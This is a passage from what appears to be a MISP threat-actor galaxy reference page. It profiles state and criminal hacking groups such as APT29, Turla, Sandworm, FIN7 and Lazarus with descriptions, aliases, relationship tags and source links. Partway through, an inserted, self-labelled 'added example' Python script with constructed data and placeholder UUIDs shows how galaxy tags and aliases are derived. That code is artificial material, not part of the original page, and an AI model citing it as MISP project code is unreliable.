https://www.accenture.com/t20190213T141124Zw/us-en/_acnmedia/PDF-94/Accenture-SNAKEMACKEREL-Threat-Campaign-Likely-Targeting-NATO-Members-Defense-and-Military-Outlets.pdf

https://marcoramilli.com/2019/12/05/apt28-attacks-evolution/

https://www.microsoft.com/security/blog/2020/09/10/strontium-detecting-new-patters-credential-harvesting/

https://www.bleepingcomputer.com/news/security/russian-hackers-use-fake-nato-training-docs-to-breach-govt-networks/

https://quointelligence.eu/2020/09/apt28-zebrocy-malware-campaign-nato-theme/

https://unit42.paloaltonetworks.com/atoms/fighting-ursa/

https://blog.google/threat-analysis-group/continued-cyber-activity-in-eastern-europe-observed-by-tag

https://blog.google/threat-analysis-group/fog-of-war-how-the-ukraine-conflict-transformed-the-cyber-threat-landscape/
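Every entry above follows the same machine-readable pattern: a tag of the form misp-galaxy:<galaxy type>="<cluster value>", a list of vendor aliases, and "has relationships with" lines that point at clusters in other galaxies (mitre-intrusion-set, microsoft-activity-group, 360net-threat-actor) qualified with an estimative-language tag. The following is an added example, not code from the MISP galaxy document or the MISP project itself, showing how those lines are derived from galaxy cluster JSON: it builds the tag, resolves each related dest-uuid to the tag of the target cluster (reporting, rather than dropping, a uuid whose galaxy was not loaded), and maps a vendor alias such as "Forest Blizzard" back to the canonical tag. The two galaxy fragments and their UUIDs are constructed for the example; the field names (type, values, value, uuid, meta.synonyms, related, dest-uuid, tags) are those of the MISP galaxy cluster format.

```python
"""Derive misp-galaxy tags, relationship lines and alias lookups from cluster JSON.

Added example; not part of the MISP galaxy document or the MISP code base.
The two galaxy fragments below are constructed and the UUIDs are placeholders.
"""
import json

# Constructed stand-ins for clusters/threat-actor.json and
# clusters/mitre-intrusion-set.json, trimmed to the fields used here.
THREAT_ACTOR_JSON = json.dumps({
    "type": "threat-actor",
    "values": [{
        "uuid": "00000000-0000-4000-8000-000000000001",
        "value": "APT28",
        "meta": {"synonyms": ["Pawn Storm", "FANCY BEAR", "Sofacy", "Forest Blizzard"]},
        "related": [
            {"dest-uuid": "00000000-0000-4000-8000-000000000002", "type": "similar",
             "tags": ['estimative-language:likelihood-probability="likely"']},
            # Points at a galaxy that is not loaded below; must surface, not vanish.
            {"dest-uuid": "00000000-0000-4000-8000-0000000000ff", "type": "similar",
             "tags": ['estimative-language:likelihood-probability="likely"']},
        ],
    }],
})
MITRE_JSON = json.dumps({
    "type": "mitre-intrusion-set",
    "values": [{
        "uuid": "00000000-0000-4000-8000-000000000002",
        "value": "APT28 - G0007",
        "meta": {"synonyms": ["APT28"]},
    }],
})


def tag_for(galaxy_type, value):
    """Render the tag exactly as MISP prints it: misp-galaxy:<type>="<value>"."""
    return f'misp-galaxy:{galaxy_type}="{value}"'


def load_galaxies(*galaxy_texts):
    """Index clusters from several galaxy files by uuid.

    Each entry keeps the galaxy type next to the cluster, because a related
    dest-uuid has to be rendered as a tag of the *target* galaxy, not the source.
    """
    index = {}
    for text in galaxy_texts:
        galaxy = json.loads(text)
        for cluster in galaxy["values"]:
            index[cluster["uuid"]] = (galaxy["type"], cluster)
    return index


def relationships(index, uuid):
    """Render the 'has relationships with' lines for the cluster with this uuid."""
    _, cluster = index[uuid]
    lines = []
    for rel in cluster.get("related", []):
        target = index.get(rel["dest-uuid"])
        if target is None:
            # Unresolvable: the target galaxy is missing or the uuid is stale.
            lines.append(f'{rel["type"]}: <unresolved {rel["dest-uuid"]}>')
            continue
        target_type, target_cluster = target
        qualifier = " with " + " ".join(rel["tags"]) if rel.get("tags") else ""
        lines.append(f'{rel["type"]}: {tag_for(target_type, target_cluster["value"])}{qualifier}')
    return lines


def find_by_alias(index, name):
    """Case-insensitive lookup by cluster value first, then by any synonym.

    Returns the canonical tag, or None when no cluster carries that name.
    """
    wanted = name.casefold()
    for galaxy_type, cluster in index.values():
        if cluster["value"].casefold() == wanted:
            return tag_for(galaxy_type, cluster["value"])
    for galaxy_type, cluster in index.values():
        synonyms = cluster.get("meta", {}).get("synonyms", [])
        if any(s.casefold() == wanted for s in synonyms):
            return tag_for(galaxy_type, cluster["value"])
    return None


if __name__ == "__main__":
    idx = load_galaxies(THREAT_ACTOR_JSON, MITRE_JSON)
    apt28 = "00000000-0000-4000-8000-000000000001"
    print("The tag is:", tag_for("threat-actor", "APT28"))
    for line in relationships(idx, apt28):
        print("  •", line)
    print("Forest Blizzard ->", find_by_alias(idx, "forest blizzard"))
```

Resolving relationships through the uuid index is what lets a relationship line name a cluster in a different galaxy; an alias lookup that checks the value before the synonyms avoids returning the MITRE cluster when "APT28" is also listed there as a synonym.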

APT29

A 2015 report by F-Secure describes APT29 as: 'The Dukes are a well-resourced, highly dedicated and organized cyberespionage group that we believe has been working for the Russian Federation since at least 2008 to collect intelligence in support of foreign and security policy decision-making. The Dukes show unusual confidence in their ability to continue successfully compromising their targets, as well as in their ability to operate with impunity. The Dukes primarily target Western governments and related organizations, such as government ministries and agencies, political think tanks, and governmental subcontractors. Their targets have also included the governments of members of the Commonwealth of Independent States; Asian, African, and Middle Eastern governments; organizations associated with Chechen extremism; and Russian speakers engaged in the illicit trade of controlled substances and drugs. The Dukes are known to employ a vast arsenal of malware toolsets, which we identify as MiniDuke, CosmicDuke, OnionDuke, CozyDuke, CloudDuke, SeaDuke, HammerDuke, PinchDuke, and GeminiDuke. In recent years, the Dukes have engaged in apparently biannual large-scale spear-phishing campaigns against hundreds or even thousands of recipients associated with governmental institutions and affiliated organizations. These campaigns utilize a smash-and-grab approach involving a fast but noisy break-in followed by the rapid collection and exfiltration of as much data as possible. If the compromised target is discovered to be of value, the Dukes will quickly switch the toolset used and move to using stealthier tactics focused on persistent compromise and long-term intelligence gathering. This threat actor targets government ministries and agencies in the West, Central Asia, East Africa, and the Middle East; Chechen extremist groups; Russian organized crime; and think tanks. It is suspected to be behind the 2015 compromise of unclassified networks at the White House, Department of State, Pentagon, and the Joint Chiefs of Staff. The threat actor includes all of the Dukes tool sets, including MiniDuke, CosmicDuke, OnionDuke, CozyDuke, SeaDuke, CloudDuke (aka MiniDionis), and HammerDuke (aka Hammertoss).'

The tag is: misp-galaxy:threat-actor="APT29"

APT29 is also known as:

  • Group 100

  • COZY BEAR

  • The Dukes

  • Minidionis

  • SeaDuke

  • YTTRIUM

  • IRON HEMLOCK

  • Grizzly Steppe

  • G0016

  • ATK7

  • Cloaked Ursa

  • TA421

  • Blue Kitsune

  • ITG11

  • BlueBravo

  • UAC-0029

APT29 has relationships with:

  • similar: misp-galaxy:mitre-intrusion-set="APT29 - G0016" with estimative-language:likelihood-probability="likely"

  • uses: misp-galaxy:tool="SNOWYAMBER" with estimative-language:likelihood-probability="likely"

  • uses: misp-galaxy:tool="HALFRIG" with estimative-language:likelihood-probability="likely"

  • uses: misp-galaxy:tool="QUARTERRIG" with estimative-language:likelihood-probability="likely"

  • similar: misp-galaxy:microsoft-activity-group="Midnight Blizzard" with estimative-language:likelihood-probability="likely"

Table 11816. Table References

Links

https://labsblog.f-secure.com/2015/09/17/the-dukes-7-years-of-russian-cyber-espionage/

https://www2.fireeye.com/rs/848-DID-242/images/rpt-apt29-hammertoss.pdf

https://www.us-cert.gov/sites/default/files/publications/AR-17-20045_Enhanced_Analysis_of_GRIZZLY_STEPPE_Activity.pdf

https://www.fireeye.com/blog/threat-research/2017/03/dissecting_one_ofap.html

https://www.cfr.org/interactive/cyber-operations/dukes

https://pylos.co/2018/11/18/cozybear-in-from-the-cold/

https://cloudblogs.microsoft.com/microsoftsecure/2018/12/03/analysis-of-cyberattack-on-u-s-think-tanks-non-profits-public-sector-by-unidentified-attackers/

https://www.secureworks.com/research/threat-profiles/iron-hemlock

https://attack.mitre.org/groups/G0016

https://unit42.paloaltonetworks.com/atoms/cloaked-ursa/

https://go.recordedfuture.com/hubfs/reports/cta-2023-0127.pdf

https://cip.gov.ua/services/cm/api/attachment/download?id=60068

Turla

A 2014 Guardian article described Turla as: 'Dubbed the Turla hackers, initial intelligence had indicated western powers were key targets, but it was later determined embassies for Eastern Bloc nations were of more interest. Embassies in Belgium, Ukraine, China, Jordan, Greece, Kazakhstan, Armenia, Poland, and Germany were all attacked, though researchers from Kaspersky Lab and Symantec could not confirm which countries were the true targets. In one case from May 2012, the office of the prime minister of a former Soviet Union member country was infected, leading to 60 further computers being affected, Symantec researchers said. There were some other victims, including the ministry for health of a Western European country, the ministry for education of a Central American country, a state electricity provider in the Middle East and a medical organisation in the US, according to Symantec. It is believed the group was also responsible for a much-documented 2008 attack on the US Central Command. The attackers - who continue to operate - have ostensibly sought to carry out surveillance on targets and pilfer data, though their use of encryption across their networks has made it difficult to ascertain exactly what the hackers took. Kaspersky Lab, however, picked up a number of the attackers' searches through their victims' emails, which included terms such as "Nato" and "EU energy dialogue". Though attribution is difficult to substantiate, Russia has previously been suspected of carrying out the attacks and Symantec's Gavin O'Gorman told the Guardian a number of the hackers appeared to be using Russian names and language in their notes for their malicious code. Cyrillic was also seen in use.'

The tag is: misp-galaxy:threat-actor="Turla"

Turla is also known as:

  • Snake

  • VENOMOUS Bear

  • Group 88

  • Waterbug

  • WRAITH

  • Uroburos

  • Pfinet

  • TAG_0530

  • KRYPTON

  • Hippo Team

  • Pacifier APT

  • Popeye

  • SIG23

  • IRON HUNTER

  • MAKERSMARK

  • ATK13

  • G0010

  • ITG12

  • Blue Python

  • SUMMIT

  • UNC4210

  • Secret Blizzard

  • UAC-0144

  • UAC-0024

  • UAC-0003

Turla has relationships with:

  • similar: misp-galaxy:mitre-intrusion-set="Turla - G0010" with estimative-language:likelihood-probability="likely"

  • similar: misp-galaxy:threat-actor="APT26" with estimative-language:likelihood-probability="likely"

  • similar: misp-galaxy:microsoft-activity-group="Secret Blizzard" with estimative-language:likelihood-probability="likely"

Table 11817. Table References

Links

https://www.circl.lu/pub/tr-25/

https://securelist.com/introducing-whitebear/81638/

https://securelist.com/the-epic-turla-operation/65545/

https://www.cfr.org/interactive/cyber-operations/turla

https://www.nytimes.com/2010/08/26/technology/26cyber.html

https://securelist.com/blog/research/67962/the-penquin-turla-2/

https://www.kaspersky.com/blog/moonlight-maze-the-lessons/6713/

https://www2.fireeye.com/rs/848-DID-242/images/rpt-witchcoven.pdf

https://securelist.com/analysis/publications/65545/the-epic-turla-operation/

https://threatpost.com/linux-modules-connected-to-turla-apt-discovered/109765/

https://securelist.com/satellite-turla-apt-command-and-control-in-the-sky/72081/

https://www.welivesecurity.com/2018/05/22/turla-mosquito-shift-towards-generic-tools/

https://www.first.org/resources/papers/tbilisi2014/turla-operations_and_development.pdf

https://yle.fi/uutiset/osasto/news/russian_group_behind_2013_foreign_ministry_hack/8591548

https://www.welivesecurity.com/2017/03/30/carbon-paper-peering-turlas-second-stage-backdoor/

https://securelist.com/blog/research/72081/satellite-turla-apt-command-and-control-in-the-sky/

https://www.nccgroup.trust/uk/about-us/newsroom-and-events/blogs/2018/november/turla-png-dropper-is-back/

https://docs.broadcom.com/doc/waterbug-attack-group

https://www.theguardian.com/technology/2014/aug/07/turla-hackers-spying-governments-researcher-kaspersky-symantec

https://www.bleepingcomputer.com/news/security/turla-outlook-backdoor-uses-clever-tactics-for-stealth-and-persistence/

https://download.bitdefender.com/resources/files/News/CaseStudies/study/115/Bitdefender-Whitepaper-PAC-A4-en-EN1.pdf

https://www.melani.admin.ch/melani/en/home/dokumentation/reports/technical-reports/technical-report_apt_case_ruag.html

https://unit42.paloaltonetworks.com/unit42-kazuar-multiplatform-espionage-backdoor-api-access/

https://www.engadget.com/2017/06/07/russian-malware-hidden-britney-spears-instagram/

https://www.welivesecurity.com/wp-content/uploads/2017/08/eset-gazer.pdf

https://www.trendmicro.com/vinfo/vn/security/news/cyber-attacks/cyberespionage-group-turla-deploys-backdoor-ahead-of-g20-summit

https://www.zdnet.com/article/this-hacking-gang-just-updated-the-malware-it-uses-against-uk-targets/

https://attack.mitre.org/groups/G0010/

https://www.telsy.com/turla-venomous-bear-updates-its-arsenal-newpass-appears-on-the-apt-threat-scene/

https://www.secureworks.com/research/threat-profiles/iron-hunter

https://www.welivesecurity.com/2020/12/02/turla-crutch-keeping-back-door-open/

https://blog.google/threat-analysis-group/continued-cyber-activity-in-eastern-europe-observed-by-tag

https://blog.google/threat-analysis-group/fog-of-war-how-the-ukraine-conflict-transformed-the-cyber-threat-landscape/

https://services.google.com/fh/files/blogs/google_fog_of_war_research_report.pdf

https://cip.gov.ua/services/cm/api/attachment/download?id=60068

ENERGETIC BEAR

A Russian group that collects intelligence on the energy industry.

The tag is: misp-galaxy:threat-actor="ENERGETIC BEAR"

ENERGETIC BEAR is also known as:

  • BERSERK BEAR

  • ALLANITE

  • CASTLE

  • DYMALLOY

  • TG-4192

  • Dragonfly

  • Crouching Yeti

  • Group 24

  • Havex

  • Koala Team

  • IRON LIBERTY

  • G0035

  • ATK6

  • ITG15

  • BROMINE

  • Blue Kraken

  • Ghost Blizzard

ENERGETIC BEAR has relationships with:

  • similar: misp-galaxy:mitre-intrusion-set="Dragonfly - G0035" with estimative-language:likelihood-probability="likely"

  • similar: misp-galaxy:microsoft-activity-group="Ghost Blizzard" with estimative-language:likelihood-probability="likely"

Table 11818. Table References

Links

https://www.gov.uk/government/publications/russias-fsb-malign-cyber-activity-factsheet/russias-fsb-malign-activity-factsheet

https://web.archive.org/web/20161020180305/http://www.scmagazineuk.com/iran-and-russia-blamed-for-state-sponsored-espionage/article/330401/

https://paper.seebug.org/papers/APT/APT_CyberCriminal_Campagin/2014/Dragonfly_Threat_Against_Western_Energy_Suppliers.pdf

http://www.netresec.com/?page=Blog&month=2014-10&post=Full-Disclosure-of-Havex-Trojans

https://threatpost.com/energy-watering-hole-attack-used-lightsout-exploit-kit/104772/

https://www.cfr.org/interactive/cyber-operations/crouching-yeti

https://www.reuters.com/article/us-ukraine-cyber-attack-energy-idUSKBN1521BA

https://dragos.com/wp-content/uploads/CrashOverride-01.pdf

https://www.independent.ie/irish-news/statesponsored-hackers-targeted-eirgrid-electricity-network-in-devious-attack-36005921.html

https://www.riskiq.com/blog/labs/energetic-bear/

https://symantec-blogs.broadcom.com/blogs/threat-intelligence/dragonfly-energy-sector-cyber-attacks

https://www.kaspersky.com/resource-center/threats/crouching-yeti-energetic-bear-malware-threat

https://www.sans.org/reading-room/whitepapers/ICS/impact-dragonfly-malware-industrial-control-systems-36672

https://attack.mitre.org/groups/G0035/

https://www.secureworks.com/research/resurgent-iron-liberty-targeting-energy-sector

https://dragos.com/adversaries.html

https://dragos.com/media/2017-Review-Industrial-Control-System-Threats.pdf

https://www.cfr.org/interactive/cyber-operations/dymalloy

Sandworm

This threat actor targets industrial control systems associated with electricity and power generation, using a tool called BlackEnergy, for espionage, denial of service, and data destruction purposes. It is believed to be responsible for the 2008 DDoS attacks against Georgia prior to the Russian invasion and for the 2015 compromise of the Ukrainian electrical grid that resulted in a power outage.

The tag is: misp-galaxy:threat-actor="Sandworm"

Sandworm is also known as:

  • Quedagh

  • VOODOO BEAR

  • TEMP.Noble

  • IRON VIKING

  • G0034

  • ELECTRUM

  • TeleBots

  • IRIDIUM

  • Blue Echidna

  • FROZENBARENTS

  • UAC-0113

  • Seashell Blizzard

  • UAC-0082

Sandworm has relationships with:

  • similar: misp-galaxy:mitre-intrusion-set="Sandworm Team - G0034" with estimative-language:likelihood-probability="likely"

  • similar: misp-galaxy:threat-actor="GreyEnergy" with estimative-language:likelihood-probability="likely"

  • similar: misp-galaxy:microsoft-activity-group="Seashell Blizzard" with estimative-language:likelihood-probability="likely"

  • similar: misp-galaxy:mitre-ics-groups="Sandworm" with estimative-language:likelihood-probability="almost-certain"

  • similar: misp-galaxy:360net-threat-actor="沙虫 - APT-C-13" with estimative-language:likelihood-probability="likely"

Table 11819. Table References

Links

https://dragos.com/blog/crashoverride/CrashOverride-01.pdf

https://www.us-cert.gov/ncas/alerts/TA17-163A

https://ics.sans.org/blog/2016/01/09/confirmation-of-a-coordinated-attack-on-the-ukrainian-power-grid

https://web.archive.org/web/20141016132823/https://www.symantec.com/connect/blogs/sandworm-windows-zero-day-vulnerability-being-actively-exploited-targeted-attacks

https://ics.sans.org/blog/2015/12/30/current-reporting-on-the-cyber-attack-in-ukraine-resulting-in-power-outage

https://web.archive.org/web/20141224060545/http://blog.trendmicro.com/trendlabs-security-intelligence/timeline-of-sandworm-attacks/

https://attack.mitre.org/groups/G0034

https://blog.google/threat-analysis-group/continued-cyber-activity-in-eastern-europe-observed-by-tag

https://www.welivesecurity.com/wp-content/uploads/2017/06/Win32_Industroyer.pdf

https://dragos.com/media/2017-Review-Industrial-Control-System-Threats.pdf

https://dragos.com/adversaries.html

http://www.welivesecurity.com/2016/12/13/rise-telebots-analyzing-disruptive-killdisk-attacks

https://www.welivesecurity.com/2017/01/05/killdisk-now-targeting-linux-demands-250k-ransom-cant-decrypt

https://www.welivesecurity.com/2017/06/30/telebots-back-supply-chain-attacks-against-ukraine

https://www.welivesecurity.com/2017/05/23/xdata-ransomware-making-rounds-amid-global-wannacryptor-scare

https://www.welivesecurity.com/2017/06/27/new-ransomware-attack-hits-ukraine

https://www.welivesecurity.com/2017/10/24/bad-rabbit-not-petya-back

https://blog.google/threat-analysis-group/fog-of-war-how-the-ukraine-conflict-transformed-the-cyber-threat-landscape/

https://www.recordedfuture.com/russia-nexus-uac-0113-emulating-telecommunication-providers-in-ukraine

https://cert.gov.ua/article/405538

https://cip.gov.ua/services/cm/api/attachment/download?id=60068

FIN7

A financially motivated group targeting financial organizations or people with significant financial assets.

The tag is: misp-galaxy:threat-actor="FIN7"

FIN7 is also known as:

  • CARBON SPIDER

  • GOLD NIAGARA

  • Calcium

  • ATK32

  • G0046

  • G0008

  • Coreid

  • Carbanak

  • Sangria Tempest

  • ELBRUS

  • Carbon Spider

FIN7 has relationships with:

  • similar: misp-galaxy:mitre-intrusion-set="FIN7 - G0046" with estimative-language:likelihood-probability="likely"

  • similar: misp-galaxy:mitre-intrusion-set="Carbanak - G0008" with estimative-language:likelihood-probability="likely"

  • similar: misp-galaxy:microsoft-activity-group="Sangria Tempest" with estimative-language:likelihood-probability="likely"

Table 11820. Table References

Links

https://en.wikipedia.org/wiki/Carbanak

https://app.box.com/s/p7qzcury97tuwk26694uutujwqmwqyhe

http://2014.zeronights.ru/assets/files/slides/ivanovb-zeronights.pdf

https://web.archive.org/web/20161223002016/https://www.symantec.com/connect/blogs/odinaff-new-trojan-used-high-level-financial-attacks

https://www.proofpoint.com/us/threat-insight/post/fin7carbanak-threat-actor-unleashes-bateleur-jscript-backdoor

https://www.icebrg.io/blog/footprints-of-fin7-tracking-actor-patterns

https://www.crowdstrike.com/blog/arrests-put-new-focus-on-carbon-spider-adversary-group/

https://www.europol.europa.eu/newsroom/news/mastermind-behind-eur-1-billion-cyber-bank-robbery-arrested-in-spain

https://www.computerweekly.com/news/252446153/Three-Carbanak-cyber-heist-gang-members-arrested

https://media.kasperskycontenthub.com/wp-content/uploads/sites/43/2018/03/08064518/Carbanak_APT_eng.pdf

https://www.group-ib.com/resources/threat-research/Anunak_APT_against_financial_institutions.pdf

https://attack.mitre.org/groups/G0008/

https://www.fireeye.com/blog/threat-research/2017/03/fin7_spear_phishing.html

https://threatpost.com/fileless-malware-campaigns-tied-to-same-attacker/124369/

https://www.fireeye.com/blog/threat-research/2017/04/fin7-phishing-lnk.html

https://www.fireeye.com/blog/threat-research/2017/05/fin7-shim-databases-persistence.html

https://blog.morphisec.com/fin7-attacks-restaurant-industry

https://www.flashpoint-intel.com/blog/fin7-revisited-inside-astra-panel-and-sqlrat-malware/

https://blog.morphisec.com/fin7-attack-modifications-revealed

https://blog.morphisec.com/fin7-not-finished-morphisec-spots-new-campaign

https://securelist.com/fin7-5-the-infamous-cybercrime-rig-fin7-continues-its-activities/90703/

https://www.fireeye.com/blog/threat-research/2018/08/fin7-pursuing-an-enigmatic-and-evasive-global-criminal-operation.html

https://attack.mitre.org/groups/G0046/

https://go.crowdstrike.com/rs/281-OBQ-266/images/Report2020CrowdStrikeGlobalThreatReport.pdf

https://threatintel.blog/OPBlueRaven-Part1/

https://threatintel.blog/OPBlueRaven-Part2/

https://www.secureworks.com/research/threat-profiles/gold-niagara

https://www.computerweekly.com/news/252525240/ALPHV-BlackCat-ransomware-family-becoming-more-dangerous

https://www.deepinstinct.com/blog/understanding-the-windows-javascript-threat-landscape

https://www.microsoft.com/en-us/security/blog/2023/12/28/financially-motivated-threat-actors-misusing-app-installer/

TeamSpy Crew

Researchers have uncovered a long-term cyber-espionage campaign that used a combination of legitimate software packages and commodity malware tools to target a variety of heavy industry, government intelligence agencies and political activists. Known as the TeamSpy crew because of its affinity for using the legitimate TeamViewer application as part of its toolset, the attackers may have been active for as long as 10 years, researchers say. The attack appears to be a years-long espionage campaign, but experts who have analyzed the victim profile, malware components and command-and-control infrastructure say that it’s not entirely clear what kind of data the attackers are going after. What is clear, though, is that the attackers have been at this for a long time and that they have specific people in mind as targets. Researchers at the CrySyS Lab in Hungary were alerted by the Hungarian National Security Authority to an attack against a high-profile target in the country and began looking into the campaign. They quickly discovered that some of the infrastructure being used in the attack had been in use for some time and that the target they were investigating was by no means the only one.

The tag is: misp-galaxy:threat-actor="TeamSpy Crew"

TeamSpy Crew is also known as:

  • TeamSpy

  • Team Bear

  • Anger Bear

  • IRON LYRIC

Table 11821. Table References

Links

https://securelist.com/blog/incidents/35520/the-teamspy-crew-attacks-abusing-teamviewer-for-cyberespionage-8/

https://www.cfr.org/interactive/cyber-operations/team-spy-crew

https://threatpost.com/researchers-uncover-teamspy-attack-campaign-targeting-government-research-targets-032013/77646/

https://www.crysys.hu/publications/files/teamspy.pdf

https://d2538mqrb7brka.cloudfront.net/wp-content/uploads/sites/43/2018/03/20134928/theteamspystory_final_t2.pdf

https://www.secureworks.com/research/resurgent-iron-liberty-targeting-energy-sector

BuhTrap

Buhtrap has been active since 2014, but its first attacks against financial institutions were only detected in August 2015; before that the group focused solely on targeting banking clients. At the moment the group is known to target Russian and Ukrainian banks. From August 2015 to February 2016 Buhtrap conducted 13 successful attacks against Russian banks for a total of 1.8 billion rubles ($25.7 million). The number of successful attacks against Ukrainian banks has not been identified. Buhtrap is the first criminal group known to use a network worm to infect the whole bank infrastructure, which significantly increases the difficulty of removing all malicious functions from the network; as a result, banks have to shut down the whole infrastructure, causing delays in serving customers and additional losses. The malware intentionally scans for machines running the Automated Bank-Customer system of the Central Bank of Russia (referred to below as BCS CBR). We have not identified incidents of attacks involving online money transfer systems, ATMs or payment gateways, which are known to be of interest to other criminal groups.

The tag is: misp-galaxy:threat-actor="BuhTrap"

Table 11822. Table References

Links

https://www.welivesecurity.com/2015/11/11/operation-buhtrap-malware-distributed-via-ammyy-com/

https://www.group-ib.com/brochures/gib-buhtrap-report.pdf

https://community.broadcom.com/symantecenterprise/communities/community-home/librarydocuments/viewdocument?DocumentKey=8e498912-44f8-4ea0-ac50-4544f0fedd6c&CommunityKey=1ecf5f55-9545-44d6-b0f4-4e4a7f5f5e68&tab=librarydocuments

https://www.forcepoint.com/blog/security-labs/highly-evasive-code-injection-awaits-user-interaction-delivering-malware

https://www.kaspersky.com/blog/financial-trojans-2019/25690/

https://www.welivesecurity.com/2015/04/09/operation-buhtrap/

https://go.crowdstrike.com/rs/281-OBQ-266/images/Report2020CrowdStrikeGlobalThreatReport.pdf

WOLF SPIDER

FIN4 is a financially-motivated threat group that has targeted confidential information related to the public financial market, particularly regarding healthcare and pharmaceutical companies, since at least 2013. FIN4 is unique in that they do not infect victims with typical persistent malware, but rather they focus on capturing credentials authorized to access email and other non-public correspondence.

The tag is: misp-galaxy:threat-actor="WOLF SPIDER"

WOLF SPIDER is also known as:

  • FIN4

  • G0085

Table 11823. Table References

Links

https://www.reuters.com/article/2015/06/23/us-hackers-insidertrading-idUSKBN0P31M720150623

https://www.fireeye.com/blog/threat-research/2014/11/fin4_stealing_insid.html

https://www2.fireeye.com/rs/fireye/images/rpt-fin4.pdf

https://pwc.blogs.com/cyber_security_updates/2015/06/unfin4ished-business.html

https://attack.mitre.org/groups/G0085/

Boulder Bear

First observed activity in December 2013.

The tag is: misp-galaxy:threat-actor="Boulder Bear"

SHARK SPIDER

This group’s activity was first observed in November 2013. It leverages a banking Trojan more commonly known as Shylock which aims to compromise online banking credentials and credentials related to Bitcoin wallets.

The tag is: misp-galaxy:threat-actor="SHARK SPIDER"

UNION SPIDER

Adversary targeting manufacturing and industrial organizations.

The tag is: misp-galaxy:threat-actor="UNION SPIDER"

Table 11824. Table References

Links

https://docs.huihoo.com/rsaconference/usa-2014/anf-t07b-the-art-of-attribution-identifying-and-pursuing-your-cyber-adversaries-final.pdf

Silent Chollima

Andariel is a threat actor that primarily targets South Korean corporations and institutions. It is believed to collaborate with, or operate as a subsidiary of, the Lazarus threat group. The group (also tracked as WHOis Team) uses spear phishing, watering hole attacks, and supply chain attacks for initial access. It has been known to exploit vulnerabilities and to use malware such as Infostealer and TigerRAT.

The tag is: misp-galaxy:threat-actor="Silent Chollima"

Silent Chollima is also known as:

  • OperationTroy

  • Guardian of Peace

  • GOP

  • WHOis Team

  • Andariel

  • Subgroup: Andariel

  • Onyx Sleet

  • PLUTONIUM

Table 11825. Table References

Links

https://docs.huihoo.com/rsaconference/usa-2014/anf-t07b-the-art-of-attribution-identifying-and-pursuing-your-cyber-adversaries-final.pdf

https://www.microsoft.com/en-us/security/blog/2023/10/18/multiple-north-korean-threat-actors-exploiting-the-teamcity-cve-2023-42793-vulnerability/

Lazarus Group

Since 2009, HIDDEN COBRA actors have leveraged their capabilities to target and compromise a range of victims; some intrusions have resulted in the exfiltration of data while others have been disruptive in nature. Commercial reporting has referred to this activity as Lazarus Group and Guardians of Peace. Tools and capabilities used by HIDDEN COBRA actors include DDoS botnets, keyloggers, remote access tools (RATs), and wiper malware. Variants of malware and tools used by HIDDEN COBRA actors include Destover, Duuzer, and Hangman.

The tag is: misp-galaxy:threat-actor="Lazarus Group"

Lazarus Group is also known as:

  • Operation DarkSeoul

  • Dark Seoul

  • Hidden Cobra

  • Hastati Group

  • Andariel

  • Unit 121

  • Bureau 121

  • NewRomanic Cyber Army Team

  • Bluenoroff

  • Subgroup: Bluenoroff

  • Group 77

  • Labyrinth Chollima

  • Operation Troy

  • Operation GhostSecret

  • Operation AppleJeus

  • APT38

  • APT 38

  • Stardust Chollima

  • Whois Hacking Team

  • Zinc

  • Appleworm

  • Nickel Academy

  • APT-C-26

  • NICKEL GLADSTONE

  • COVELLITE

  • ATK3

  • G0032

  • ATK117

  • G0082

  • Citrine Sleet

  • DEV-0139

  • DEV-1222

  • Diamond Sleet

  • ZINC

  • Sapphire Sleet

  • COPERNICIUM

  • TA404

  • Lazarus group

Lazarus Group has relationships with:

  • similar: misp-galaxy:mitre-intrusion-set="Lazarus Group - G0032" with estimative-language:likelihood-probability="likely"

  • similar: misp-galaxy:threat-actor="Operation Sharpshooter" with estimative-language:likelihood-probability="likely"

  • linked-to: misp-galaxy:threat-actor="APT37" with estimative-language:likelihood-probability="likely"

  • similar: misp-galaxy:mitre-ics-groups="Lazarus group" with estimative-language:likelihood-probability="almost-certain"

  • similar: misp-galaxy:360net-threat-actor="Lazarus - APT-C-26" with estimative-language:likelihood-probability="likely"

  • similar: misp-galaxy:microsoft-activity-group="Diamond Sleet" with estimative-language:likelihood-probability="likely"

  • similar: misp-galaxy:microsoft-activity-group="Sapphire Sleet" with estimative-language:likelihood-probability="likely"

Table 11826. Table References

Links

https://threatpost.com/operation-blockbuster-coalition-ties-destructive-attacks-to-lazarus-group/116422/

https://www.us-cert.gov/ncas/alerts/TA17-164A

https://www.us-cert.gov/ncas/alerts/TA17-318A

https://www.us-cert.gov/ncas/alerts/TA17-318B

https://securelist.com/operation-applejeus/87553/

https://securelist.com/lazarus-under-the-hood/77908/

https://www.us-cert.gov/HIDDEN-COBRA-North-Korean-Malicious-Cyber-Activity

https://www.mcafee.com/enterprise/en-us/assets/white-papers/wp-dissecting-operation-troy.pdf

https://www.bleepingcomputer.com/news/security/north-korean-hackers-are-up-to-no-good-again/

https://www.cfr.org/interactive/cyber-operations/lazarus-group

https://www.cfr.org/interactive/cyber-operations/operation-ghostsecret

https://www.cfr.org/interactive/cyber-operations/compromise-cryptocurrency-exchanges-south-korea

https://www.bleepingcomputer.com/news/security/lazarus-group-deploys-its-first-mac-malware-in-cryptocurrency-exchange-hack/

https://content.fireeye.com/apt/rpt-apt38

https://blog.malwarebytes.com/threat-analysis/2019/03/the-advanced-persistent-threat-files-lazarus-group/

https://www.theguardian.com/world/2009/jul/08/south-korea-cyber-attack

https://web.archive.org/web/20131123012339/https://www.symantec.com/connect/blogs/trojankoredos-comes-unwelcomed-surprise

https://www.nytimes.com/2013/03/21/world/asia/south-korea-computer-network-crashes.html

https://web.archive.org/web/20130607233212/https://www.symantec.com/connect/blogs/south-korean-financial-companies-targeted-castov

https://web.archive.org/web/20130701021735/https://www.symantec.com/connect/blogs/four-years-darkseoul-cyberattacks-against-south-korea-continue-anniversary-korean-war

https://www.trendmicro.com/vinfo/us/security/news/cyber-attacks/the-hack-of-sony-pictures-what-you-need-to-know

https://blog.trendmicro.com/trendlabs-security-intelligence/new-killdisk-variant-hits-financial-organizations-in-latin-america/

https://www.welivesecurity.com/2018/04/03/lazarus-killdisk-central-american-casino/

https://securingtomorrow.mcafee.com/other-blogs/mcafee-labs/hidden-cobra-targets-turkish-financial-sector-new-bankshot-implant/

https://securingtomorrow.mcafee.com/other-blogs/mcafee-labs/analyzing-operation-ghostsecret-attack-seeks-to-steal-data-worldwide/

https://www.us-cert.gov/ncas/analysis-reports/AR19-129A

https://securingtomorrow.mcafee.com/other-blogs/mcafee-labs/operation-sharpshooter-targets-global-defense-critical-infrastructure/

